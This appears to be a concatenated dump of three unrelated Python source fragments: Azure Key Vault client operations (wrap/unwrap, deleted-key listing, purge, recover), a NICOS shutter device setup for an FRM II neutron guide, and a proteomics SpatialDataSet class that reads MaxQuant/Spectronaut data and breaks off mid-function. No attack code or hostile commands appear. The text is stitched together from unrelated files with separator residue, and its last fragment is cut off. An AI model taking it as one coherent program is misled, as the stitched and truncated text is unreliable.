:type key_version: str
:param parameters: The parameters for wrap operation.
:type parameters: ~azure.keyvault.v7_1.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyOperationsParameters')
request = build_wrap_key_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.wrap_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
wrap_key.metadata = {'url': '/keys/{key-name}/{key-version}/wrapkey'} # type: ignore
@distributed_trace
def unwrap_key(
self,
vault_base_url, # type: str
key_name, # type: str
key_version, # type: str
parameters, # type: "_models.KeyOperationsParameters"
**kwargs # type: Any
):
# type: (...) -> "_models.KeyOperationResult"
"""Unwraps a symmetric key using the specified key that was initially used for wrapping that key.
The UNWRAP operation supports decryption of a symmetric key using the target key encryption
key. This operation is the reverse of the WRAP operation. The UNWRAP operation applies to
asymmetric and symmetric keys stored in Azure Key Vault since it uses the private portion of
the key. This operation requires the keys/unwrapKey permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:param key_version: The version of the key.
:type key_version: str
:param parameters: The parameters for the key operation.
:type parameters: ~azure.keyvault.v7_1.models.KeyOperationsParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyOperationResult, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(parameters, 'KeyOperationsParameters')
request = build_unwrap_key_request(
key_name=key_name,
key_version=key_version,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.unwrap_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
unwrap_key.metadata = {'url': '/keys/{key-name}/{key-version}/unwrapkey'} # type: ignore
@distributed_trace
def get_deleted_keys(
self,
vault_base_url, # type: str
maxresults=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.DeletedKeyListResult"]
"""Lists the deleted keys in the specified vault.
Retrieves a list of the keys in the Key Vault as JSON Web Key structures that contain the
public part of a deleted key. This operation includes deletion-specific information. The Get
Deleted Keys operation is applicable for vaults enabled for soft-delete. While the operation
can be invoked on any vault, it will return an error if invoked on a non soft-delete enabled
vault. This operation requires the keys/list permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param maxresults: Maximum number of results to return in a page. If not specified the service
will return up to 25 results.
:type maxresults: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either DeletedKeyListResult or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.keyvault.v7_1.models.DeletedKeyListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "7.1") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_get_deleted_keys_request(
api_version=api_version,
maxresults=maxresults,
template_url=self.get_deleted_keys.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
else:
request = build_get_deleted_keys_request(
api_version=api_version,
maxresults=maxresults,
template_url=next_link,
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("DeletedKeyListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
get_deleted_keys.metadata = {'url': '/deletedkeys'} # type: ignore
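    # Hypothetical usage sketch (names are placeholders): get_deleted_keys returns an
    # ItemPaged iterator, so callers can iterate the deleted keys directly while paging
    # and the optional `maxresults` page size are handled by prepare_request/get_next above.
    #
    #     for deleted_key in client.get_deleted_keys("https://myvault.vault.azure.net"):
    #         print(deleted_key.kid)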
@distributed_trace
def get_deleted_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.DeletedKeyBundle"
"""Gets the public part of a deleted key.
The Get Deleted Key operation is applicable for soft-delete enabled vaults. While the operation
can be invoked on any vault, it will return an error if invoked on a non soft-delete enabled
vault. This operation requires the keys/get permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeletedKeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.DeletedKeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DeletedKeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_get_deleted_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.get_deleted_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DeletedKeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_deleted_key.metadata = {'url': '/deletedkeys/{key-name}'} # type: ignore
@distributed_trace
def purge_deleted_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Permanently deletes the specified key.
The Purge Deleted Key operation is applicable for soft-delete enabled vaults. While the
operation can be invoked on any vault, it will return an error if invoked on a non soft-delete
enabled vault. This operation requires the keys/purge permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_purge_deleted_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.purge_deleted_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
purge_deleted_key.metadata = {'url': '/deletedkeys/{key-name}'} # type: ignore
@distributed_trace
def recover_deleted_key(
self,
vault_base_url, # type: str
key_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.KeyBundle"
"""Recovers the deleted key to its latest version.
The Recover Deleted Key operation is applicable for deleted keys in soft-delete enabled vaults.
It recovers the deleted key back to its latest version under /keys. An attempt to recover an
non-deleted key will return an error. Consider this the inverse of the delete operation on
soft-delete enabled vaults. This operation requires the keys/recover permission.
:param vault_base_url: The vault name, for example https://myvault.vault.azure.net.
:type vault_base_url: str
:param key_name: The name of the deleted key.
:type key_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyBundle, or the result of cls(response)
:rtype: ~azure.keyvault.v7_1.models.KeyBundle
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyBundle"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = kwargs.pop('api_version', "7.1") # type: str
request = build_recover_deleted_key_request(
key_name=key_name,
api_version=api_version,
template_url=self.recover_deleted_key.metadata['url'],
)
request = _convert_request(request)
path_format_arguments = {
"vaultBaseUrl": self._serialize.url("vault_base_url", vault_base_url, 'str', skip_quote=True),
}
request.url = self._client.format_url(request.url, **path_format_arguments)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.KeyVaultError, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('KeyBundle', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
recover_deleted_key.metadata = {'url': '/deletedkeys/{key-name}/recover'} # type: ignore
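    # Hypothetical sketch of the soft-delete lifecycle covered by the operations above
    # (`client` and `vault_url` are placeholders): a deleted key can be inspected,
    # recovered back under /keys, or purged irreversibly if keys/purge is permitted.
    #
    #     deleted = client.get_deleted_key(vault_url, "my-key")
    #     client.recover_deleted_key(vault_url, "my-key")
    #     # client.purge_deleted_key(vault_url, "my-key")   # permanent, cannot be undone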
|
py | 1a4fb1b9d94074be7c113191ca167e09d8fa24fe | description = 'FRM II neutron guide line 2b shutter'
group = 'lowlevel'
includes = ['guidehall']
tango_base = 'tango://ictrlfs.ictrl.frm2:10000/mlz/'
devices = dict(
NL2b = device('nicos.devices.tango.NamedDigitalInput',
description = 'NL2b shutter status',
mapping = {'closed': 0,
'open': 1},
pollinterval = 60,
maxage = 120,
tangodevice = tango_base + 'shutter/nl2b',
),
)
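# Illustration (not part of the setup file): NamedDigitalInput maps the raw integer read
# from the Tango device to the state name defined above, so a value of 0 is reported as
# 'closed' and 1 as 'open' when the NL2b device is read in a NICOS session.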
|
py | 1a4fb27801b1e966c597f4aba1a5841a2ba53c3c | import natsort
import numpy as np
import pandas as pd
import plotly.io as pio
import plotly.express as px
import plotly.graph_objects as go
import plotly.figure_factory as ff
import re
import traceback
from io import BytesIO
from sklearn.decomposition import PCA
from sklearn.metrics import pairwise as pw
import json
import statistics
import matplotlib.pyplot as plt
import matplotlib_venn as venn
from matplotlib_venn import venn2, venn3, venn3_circles
from PIL import Image
from upsetplot import from_memberships
from upsetplot import plot as upplot
import pkg_resources
def natsort_index_keys(x):
order = natsort.natsorted(np.unique(x.values))
return pd.Index([order.index(el) for el in x], name=x.name)
def natsort_list_keys(x):
order = natsort.natsorted(np.unique(x))
return [order.index(el) for el in x]
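# Example of the natural-sort helpers above: fraction labels are ordered numerically rather
# than lexicographically, and each label is then replaced by its rank in that order.
#
#     natsort.natsorted(["24K", "03K", "01K"])   # -> ["01K", "03K", "24K"]
#     natsort_list_keys(["24K", "03K", "01K"])   # -> [2, 1, 0]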
class SpatialDataSet:
regex = {
"imported_columns": "^[Rr]atio H/L (?!normalized|type|is.*|variability|count)[^ ]+|^Ratio H/L variability.... .+|^Ratio H/L count .+|id$|[Mm][Ss].*[cC]ount.+$|[Ll][Ff][Qq].*|.*[nN]ames.*|.*[Pp][rR]otein.[Ii][Dd]s.*|[Pp]otential.[cC]ontaminant|[Oo]nly.[iI]dentified.[bB]y.[sS]ite|[Rr]everse|[Ss]core|[Qq]-[Vv]alue|R.Condition|PG.Genes|PG.ProteinGroups|PG.Cscore|PG.Qvalue|PG.RunEvidenceCount|PG.Quantity|^Proteins$|^Sequence$"
}
acquisition_set_dict = {
"LFQ6 - Spectronaut" : ["LFQ intensity", "MS/MS count"],
"LFQ5 - Spectronaut" : ["LFQ intensity", "MS/MS count"],
"LFQ5 - MQ" : ["[Ll][Ff][Qq].[Ii]ntensity", "[Mm][Ss]/[Mm][Ss].[cC]ount", "[Ii]ntensity"],
"LFQ6 - MQ" : ["[Ll][Ff][Qq].[Ii]ntensity", "[Mm][Ss]/[Mm][Ss].[cC]ount", "[Ii]ntensity"],
"SILAC - MQ" : [ "[Rr]atio.[Hh]/[Ll](?!.[Vv]aria|.[Cc]ount)","[Rr]atio.[Hh]/[Ll].[Vv]ariability.\[%\]", "[Rr]atio.[Hh]/[Ll].[cC]ount"],
"Custom": ["(?!Protein IDs|Gene names)"]
}
Spectronaut_columnRenaming = {
"R.Condition": "Map", "PG.Genes" : "Gene names", "PG.Qvalue": "Q-value", "PG.Cscore":"C-Score",
"PG.ProteinGroups" : "Protein IDs", "PG.RunEvidenceCount" : "MS/MS count", "PG.Quantity" : "LFQ intensity"
}
css_color = ["#b2df8a", "#6a3d9a", "#e31a1c", "#b15928", "#fdbf6f", "#ff7f00", "#cab2d6", "#fb9a99", "#1f78b4", "#ffff99", "#a6cee3",
"#33a02c", "blue", "orange", "goldenrod", "lightcoral", "magenta", "brown", "lightpink", "red", "turquoise",
"khaki", "darkgoldenrod","darkturquoise", "darkviolet", "greenyellow", "darksalmon", "hotpink", "indianred", "indigo","darkolivegreen",
"coral", "aqua", "beige", "bisque", "black", "blanchedalmond", "blueviolet", "burlywood", "cadetblue", "yellowgreen", "chartreuse",
"chocolate", "cornflowerblue", "cornsilk", "darkblue", "darkcyan", "darkgray", "darkgrey", "darkgreen", "darkkhaki", "darkmagenta",
"darkorange", "darkorchid", "darkred", "darkseagreen", "darkslateblue", "snow", "springgreen", "darkslategrey", "mediumpurple", "oldlace",
"olive", "lightseagreen", "deeppink", "deepskyblue", "dimgray", "dimgrey", "dodgerblue", "firebrick", "floralwhite", "forestgreen",
"fuchsia", "gainsboro", "ghostwhite", "gold", "gray", "ivory", "lavenderblush", "lawngreen", "lemonchiffon", "lightblue", "lightcyan",
"fuchsia", "gainsboro", "ghostwhite", "gold", "gray", "ivory", "lavenderblush", "lawngreen", "lemonchiffon", "lightblue", "lightcyan",
"lightgoldenrodyellow", "lightgray", "lightgrey", "lightgreen", "lightsalmon", "lightskyblue", "lightslategray", "lightslategrey",
"lightsteelblue", "lightyellow", "lime", "limegreen", "linen", "maroon", "mediumaquamarine", "mediumblue", "mediumseagreen",
"mediumslateblue", "mediumspringgreen", "mediumturquoise", "mediumvioletred", "midnightblue", "mintcream", "mistyrose", "moccasin",
"olivedrab", "orangered", "orchid", "palegoldenrod", "palegreen", "paleturquoise", "palevioletred", "papayawhip", "peachpuff", "peru",
"pink", "plum", "powderblue", "rosybrown", "royalblue", "saddlebrown", "salmon", "sandybrown", "seagreen", "seashell", "sienna", "silver",
"skyblue", "slateblue", "steelblue", "teal", "thistle", "tomato", "violet", "wheat", "white", "whitesmoke", "slategray", "slategrey",
"aquamarine", "azure","crimson", "cyan", "darkslategray", "grey","mediumorchid","navajowhite", "navy"]
analysed_datasets_dict = {}
df_organellarMarkerSet = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/organellemarkers/{}.csv'.format("Homo sapiens - Uniprot")),
usecols=lambda x: bool(re.match("Gene name|Compartment", x)))
df_organellarMarkerSet = df_organellarMarkerSet.rename(columns={"Gene name":"Gene names"})
df_organellarMarkerSet = df_organellarMarkerSet.astype({"Gene names": "str"})
def __init__(self, filename, expname, acquisition, comment, name_pattern="e.g.:.* (?P<cond>.*)_(?P<rep>.*)_(?P<frac>.*)", reannotate_genes=False, **kwargs):
self.filename = filename
self.expname = expname
self.acquisition = acquisition
self.name_pattern = name_pattern
self.comment = comment
self.imported_columns = self.regex["imported_columns"]
self.fractions, self.map_names = [], []
self.df_01_stacked, self.df_log_stacked = pd.DataFrame(), pd.DataFrame()
if acquisition == "SILAC - MQ":
if "RatioHLcount" not in kwargs.keys():
self.RatioHLcount = 2
else:
self.RatioHLcount = kwargs["RatioHLcount"]
del kwargs["RatioHLcount"]
if "RatioVariability" not in kwargs.keys():
self.RatioVariability = 30
else:
self.RatioVariability = kwargs["RatioVariability"]
del kwargs["RatioVariability"]
elif acquisition == "Custom":
self.custom_columns = kwargs["custom_columns"]
self.custom_normalized = kwargs["custom_normalized"]
self.imported_columns = "^"+"$|^".join(["$|^".join(el) if type(el) == list else el for el in self.custom_columns.values() if el not in [[], None, ""]])+"$"
#elif acquisition == "LFQ5 - MQ" or acquisition == "LFQ6 - MQ" or acquisition == "LFQ6 - Spectronaut" or acquisition == "LFQ5 - Spectronaut":
else:
if "summed_MSMS_counts" not in kwargs.keys():
self.summed_MSMS_counts = 2
else:
self.summed_MSMS_counts = kwargs["summed_MSMS_counts"]
del kwargs["summed_MSMS_counts"]
if "consecutiveLFQi" not in kwargs.keys():
self.consecutiveLFQi = 4
else:
self.consecutiveLFQi = kwargs["consecutiveLFQi"]
del kwargs["consecutiveLFQi"]
#self.markerset_or_cluster = False if "markerset_or_cluster" not in kwargs.keys() else kwargs["markerset_or_cluster"]
if "organism" not in kwargs.keys():
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format("Homo sapiens - Uniprot")))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
else:
assert kwargs["organism"]+".csv" in pkg_resources.resource_listdir(__name__, "annotations/complexes")
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format(kwargs["organism"])))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
self.organism = kwargs["organism"]
del kwargs["organism"]
self.analysed_datasets_dict = {}
self.analysis_summary_dict = {}
def data_reading(self, filename=None, content=None):
"""
Data import. Can read the df_original from a file or buffer.
        df_original contains all information of the raw file; a tab- or comma-separated file is imported.
Args:
self:
filename: string
                imported_columns : regular expression; columns that correspond to this regular expression will be imported
filename: default None, to use the class attribute. Otherwise overwrites the class attribute upon success.
content: default None, to use the filename. Any valid input to pd.read_csv can be provided, e.g. a StringIO buffer.
Returns:
            self.df_original: raw, unprocessed dataframe, single level column index
"""
# use instance attribute if no filename is provided
if filename is None:
filename = self.filename
# if no buffer is provided for the content read straight from the file
if content is None:
content = filename
if filename.endswith("xls") or filename.endswith("txt"):
self.df_original = pd.read_csv(content, sep="\t", comment="#", usecols=lambda x: bool(re.match(self.imported_columns, x)), low_memory = True)
else: #assuming csv file
self.df_original = pd.read_csv(content, sep=",", comment="#", usecols=lambda x: bool(re.match(self.imported_columns, x)), low_memory = True)
assert self.df_original.shape[0]>10 and self.df_original.shape[1]>5
self.filename = filename
return self.df_original
def processingdf(self, name_pattern=None, summed_MSMS_counts=None, consecutiveLFQi=None, RatioHLcount=None, RatioVariability=None, custom_columns=None, custom_normalized=None):
"""
Analysis of the SILAC/LFQ-MQ/LFQ-Spectronaut data will be performed. The dataframe will be filtered, normalized, and converted into a dataframe,
        characterized by a flat column index. These tasks are performed by the following functions:
indexingdf(df_original, acquisition_set_dict, acquisition, fraction_dict, name_pattern)
spectronaut_LFQ_indexingdf(df_original, Spectronaut_columnRenaming, acquisition_set_dict, acquisition, fraction_dict, name_pattern)
stringency_silac(df_index)
normalization_01_silac(df_stringency_mapfracstacked):
logarithmization_silac(df_stringency_mapfracstacked):
stringency_lfq(df_index):
normalization_01_lfq(df_stringency_mapfracstacked):
logarithmization_lfq(df_stringency_mapfracstacked):
Args:
self.acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
additional arguments can be used to override the value set by the class init function
Returns:
self:
map_names: list of Map names
df_01_stacked: df; 0-1 normalized data with "normalized profile" as column name
df_log_stacked: df; log transformed data
analysis_summary_dict["0/1 normalized data - mean"] : 0/1 normalized data across all maps by calculating the mean
["changes in shape after filtering"]
["Unique Proteins"] : unique proteins, derived from the first entry of Protein IDs, seperated by a ";"
["Analysis parameters"] : {"acquisition" : ...,
"filename" : ...,
#SILAC#
"Ratio H/L count 1 (>=X)" : ...,
"Ratio H/L count 2 (>=Y, var<Z)" : ...,
"Ratio variability (<Z, count>=Y)" : ...
#LFQ#
"consecutive data points" : ...,
"summed MS/MS counts" : ...
}
"""
if name_pattern is None:
name_pattern = self.name_pattern
if self.acquisition == "SILAC - MQ":
if RatioHLcount is None:
RatioHLcount = self.RatioHLcount
if RatioVariability is None:
RatioVariability = self.RatioVariability
elif self.acquisition == "Custom":
if custom_columns is None:
custom_columns = self.custom_columns
if custom_normalized is None:
custom_normalized = self.custom_normalized
else:
if summed_MSMS_counts is None:
summed_MSMS_counts = self.summed_MSMS_counts
if consecutiveLFQi is None:
consecutiveLFQi = self.consecutiveLFQi
shape_dict = {}
def indexingdf():
"""
For data output from MaxQuant, all columns - except of "MS/MS count" and "LFQ intensity" (LFQ) | "Ratio H/L count", "Ratio H/L variability [%]"
(SILAC) - will be set as index. A multiindex will be generated, containing "Set" ("MS/MS count", "LFQ intensity"| "Ratio H/L count", "Ratio H/L
variability [%]"), "Fraction" (= defined via "name_pattern") and "Map" (= defined via "name_pattern") as level names, allowing the stacking and
unstacking of the dataframe. The dataframe will be filtered by removing matches to the reverse database, matches only identified by site, and
potential contaminants.
Args:
self:
df_original: dataframe, columns defined through self.imported_columns
acquisition_set_dict: dictionary, all columns will be set as index, except of those that are listed in acquisition_set_dict
acquisition: string, one of "LFQ6 - Spectronaut", "LFQ5 - Spectronaut", "LFQ5 - MQ", "LFQ6 - MQ", "SILAC - MQ"
fraction_dict: "Fraction" is part of the multiindex; fraction_dict allows the renaming of the fractions e.g. 3K -> 03K
name_pattern: regular expression, to identify Map-Fraction-(Replicate)
Returns:
self:
                    df_index: multiindex dataframe, which contains 3 level labels: Map, Fraction, Type
shape_dict["Original size"] of df_original
shape_dict["Shape after categorical filtering"] of df_index
fractions: list of fractions e.g. ["01K", "03K", ...]
"""
df_original = self.df_original.copy()
df_original.rename({"Proteins": "Protein IDs"}, axis=1, inplace=True)
df_original = df_original.set_index([col for col in df_original.columns
if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]]) == False])
            # a multiindex will be generated by extracting the information about the Map, Fraction and Type from each individual column name
multiindex = pd.MultiIndex.from_arrays(
arrays=[
[[re.findall(s, col)[0] for s in self.acquisition_set_dict[self.acquisition] if re.match(s,col)][0]
for col in df_original.columns],
[re.match(self.name_pattern, col).group("rep") for col in df_original.columns] if not "<cond>" in self.name_pattern
else ["_".join(re.match(self.name_pattern, col).group("cond", "rep")) for col in df_original.columns],
[re.match(self.name_pattern, col).group("frac") for col in df_original.columns],
],
names=["Set", "Map", "Fraction"]
)
df_original.columns = multiindex
df_original.sort_index(1, inplace=True)
shape_dict["Original size"] = df_original.shape
            # start from the unfiltered frame so df_index is always defined, even if a categorical column is missing
            df_index = df_original
            try:
                df_index = df_index.xs(
                    np.nan, 0, "Reverse")
            except:
                pass
try:
df_index = df_index.xs(
np.nan, 0, "Potential contaminant")
except:
pass
try:
df_index = df_index.xs(
np.nan, 0, "Only identified by site")
except:
pass
df_index.replace(0, np.nan, inplace=True)
shape_dict["Shape after categorical filtering"] = df_index.shape
df_index.rename(columns={"MS/MS Count":"MS/MS count"}, inplace=True)
fraction_wCyt = list(df_index.columns.get_level_values("Fraction").unique())
            ############## Cyt should only be removed if it is not an NMC split
if "Cyt" in fraction_wCyt and len(fraction_wCyt) >= 4:
df_index.drop("Cyt", axis=1, level="Fraction", inplace=True)
try:
if self.acquisition == "LFQ5 - MQ":
df_index.drop("01K", axis=1, level="Fraction", inplace=True)
except:
pass
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def custom_indexing_and_normalization():
df_original = self.df_original.copy()
df_original.rename({custom_columns["ids"]: "Protein IDs", custom_columns["genes"]: "Gene names"}, axis=1, inplace=True)
df_original = df_original.set_index([col for col in df_original.columns
if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]]) == False])
# multindex will be generated, by extracting the information about the Map, Fraction and Type from each individual column name
multiindex = pd.MultiIndex.from_arrays(
arrays=[
["normalized profile" for col in df_original.columns],
[re.match(self.name_pattern, col).group("rep") for col in df_original.columns] if not "<cond>" in self.name_pattern
else ["_".join(re.match(self.name_pattern, col).group("cond", "rep")) for col in df_original.columns],
[re.match(self.name_pattern, col).group("frac") for col in df_original.columns],
],
names=["Set", "Map", "Fraction"]
)
df_original.columns = multiindex
df_original.sort_index(1, inplace=True)
shape_dict["Original size"] = df_original.shape
# for custom upload assume full normalization for now. this should be extended to valid value filtering and 0-1 normalization later
df_index = df_original.copy()
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def spectronaut_LFQ_indexingdf():
"""
            For data generated from the Spectronaut software, columns will be renamed so that they fit the scheme of the MaxQuant output data. Subsequently, all
columns - except of "MS/MS count" and "LFQ intensity" will be set as index. A multiindex will be generated, containing "Set" ("MS/MS count" and
"LFQ intensity"), Fraction" and "Map" (= defined via "name_pattern"; both based on the column name R.condition - equivalent to the column name "Map"
in df_renamed["Map"]) as level labels.
!!!
!!!It is very important to define R.Fraction, R.condition already during the setup of Spectronaut!!!
!!!
Args:
self:
df_original: dataframe, columns defined through self.imported_columns
Spectronaut_columnRenaming
acquisition_set_dict: dictionary, all columns will be set as index, except of those that are listed in acquisition_set_dict
acquisition: string, "LFQ6 - Spectronaut", "LFQ5 - Spectronaut"
fraction_dict: "Fraction" is part of the multiindex; fraction_dict allows the renaming of the fractions e.g. 3K -> 03K
name_pattern: regular expression, to identify Map-Fraction-(Replicate)
Returns:
self:
                    df_index: multiindex dataframe, which contains 3 level labels: Map, Fraction, Type
shape_dict["Original size"] of df_index
fractions: list of fractions e.g. ["01K", "03K", ...]
"""
df_original = self.df_original.copy()
df_renamed = df_original.rename(columns=self.Spectronaut_columnRenaming)
df_renamed["Fraction"] = [re.match(self.name_pattern, i).group("frac") for i in df_renamed["Map"]]
df_renamed["Map"] = [re.match(self.name_pattern, i).group("rep") for i in df_renamed["Map"]] if not "<cond>" in self.name_pattern else ["_".join(
re.match(self.name_pattern, i).group("cond", "rep")) for i in df_renamed["Map"]]
df_index = df_renamed.set_index([col for col in df_renamed.columns if any([re.match(s, col) for s in self.acquisition_set_dict[self.acquisition]])==False])
df_index.columns.names = ["Set"]
            # In case fractionated data was used, it needs to be caught and aggregated
try:
df_index = df_index.unstack(["Map", "Fraction"])
except ValueError:
df_index = df_index.groupby(by=df_index.index.names).agg(np.nansum, axis=0)
df_index = df_index.unstack(["Map", "Fraction"])
df_index.replace(0, np.nan, inplace=True)
shape_dict["Original size"]=df_index.shape
fraction_wCyt = list(df_index.columns.get_level_values("Fraction").unique())
#Cyt is removed only if it is not an NMC split
if "Cyt" in fraction_wCyt and len(fraction_wCyt) >= 4:
df_index.drop("Cyt", axis=1, level="Fraction", inplace=True)
try:
if self.acquisition == "LFQ5 - Spectronaut":
df_index.drop("01K", axis=1, level="Fraction", inplace=True)
except:
pass
self.fractions = natsort.natsorted(list(df_index.columns.get_level_values("Fraction").unique()))
self.df_index = df_index
return df_index
def stringency_silac(df_index):
"""
